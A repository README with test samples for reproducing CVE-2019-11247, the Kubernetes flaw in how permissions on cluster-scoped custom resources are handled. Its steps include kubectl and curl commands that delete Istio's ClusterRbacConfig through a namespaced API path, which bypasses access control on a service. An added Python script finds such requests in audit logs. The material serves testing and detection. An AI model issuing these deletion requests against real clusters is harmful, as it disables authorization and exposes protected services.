Dockerfile
README.md
clusterrbacconfig.yaml
cve-2019-11247.yaml
entrypoint.sh
helloworld.yaml

README.md

CVE-2019-11247

Samples for testing CVE-2019-11247, a vulnerability concerning improper handling of global-scoped custom resource permissions.

To deploy:

Use a Kubernetes cluster running an unpatched version (1.12.x, < 1.13.9, < 1.14.5, < 1.15.1) with Istio 1.1 or greater, with mTLS and sidecar injection enabled:

Note: Do not test this in a production cluster!

  1. Create the cve-2019-11247-test image: docker build .
  2. Tag the image: docker tag <image-id> <my-registry>/cve-2019-11247:latest, where <image-id> is the ID of the image built in step 1. Use a repo that you can push to locally and pull from in your cluster.
  3. docker push <my-registry>/cve-2019-11247:latest
  4. Edit the file cve-2019-11247.yaml, replacing the Deployment image with the one you pushed to above.
  5. Run kubectl apply -R -f . to deploy all the resources to your cluster.
  6. Get a shell in the test container: kubectl exec -it -c cve-2019-11247-test "$(kubectl get pods --selector "app=cve-2019-11247-test" -ojsonpath='{.items..metadata.name}')" -- /bin/sh
  7. Try to access the helloworld service (this should return a 403): curl -D - http://helloworld.default.svc.cluster.local:5000/hello
  8. Try to delete the ClusterRbacConfig default resource without a namespace (this should also fail): https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs/default -X DELETE
  9. Try to delete the ClusterRbacConfig default resource with the default namespace (this should succeed): https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs/default -X DELETE
  10. Try the helloworld service again (this should now succeed): curl -D - http://helloworld.default.svc.cluster.local:5000/hello
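
For the detection side of steps 8 and 9, the following added example (not part of this repository) scans Kubernetes API server audit log lines for requests that address a cluster-scoped custom resource through a namespaced path. The function and constant names are illustrative, and the service account name and sample events are constructed.

```python
import json
import re

# Cluster-scoped custom resources to watch, as (API group, plural) pairs.
# This entry is the resource from the steps above; add your own CRDs.
CLUSTER_SCOPED = {("rbac.istio.io", "clusterrbacconfigs")}

# Matches /apis/<group>/<version>/namespaces/<ns>/<plural>[/<name>]
NAMESPACED = re.compile(
    r"^/apis/(?P<group>[^/]+)/[^/]+/namespaces/(?P<ns>[^/]+)"
    r"/(?P<plural>[^/?]+)(?:/(?P<name>[^/?]+))?"
)

def find_namespaced_access(audit_lines, cluster_scoped=CLUSTER_SCOPED):
    """Return audit events that address a cluster-scoped custom resource
    through a namespaced URL."""
    hits = []
    for line in audit_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(event, dict):
            continue
        m = NAMESPACED.match(event.get("requestURI") or "")
        if not m or (m["group"], m["plural"]) not in cluster_scoped:
            continue
        code = (event.get("responseStatus") or {}).get("code")
        hits.append({
            "user": (event.get("user") or {}).get("username"),
            "verb": event.get("verb"),
            "namespace": m["ns"],
            "name": m["name"],
            "code": code,
            # A 2xx status means the API server acted on the request.
            "served": isinstance(code, int) and 200 <= code < 300,
        })
    return hits

# Constructed audit.k8s.io/v1 events for illustration, not real log data.
_SA = {"username": "system:serviceaccount:default:example-sa"}  # hypothetical
_BASE = "/apis/rbac.istio.io/v1alpha1"
SAMPLE = [
    json.dumps({"verb": "delete", "user": _SA, "responseStatus": {"code": 403},
                "requestURI": _BASE + "/clusterrbacconfigs/default"}),
    json.dumps({"verb": "delete", "user": _SA, "responseStatus": {"code": 200},
                "requestURI": _BASE + "/namespaces/default/clusterrbacconfigs/default"}),
    json.dumps({"verb": "get", "user": _SA, "responseStatus": {"code": 200},
                "requestURI": "/apis/apps/v1/namespaces/default/deployments/helloworld"}),
    "truncated line, not JSON",
]
```

A hit with "served" set to true on a cluster still running one of the unpatched versions listed above is the pattern to investigate; on a patched cluster the same request shape should no longer be served.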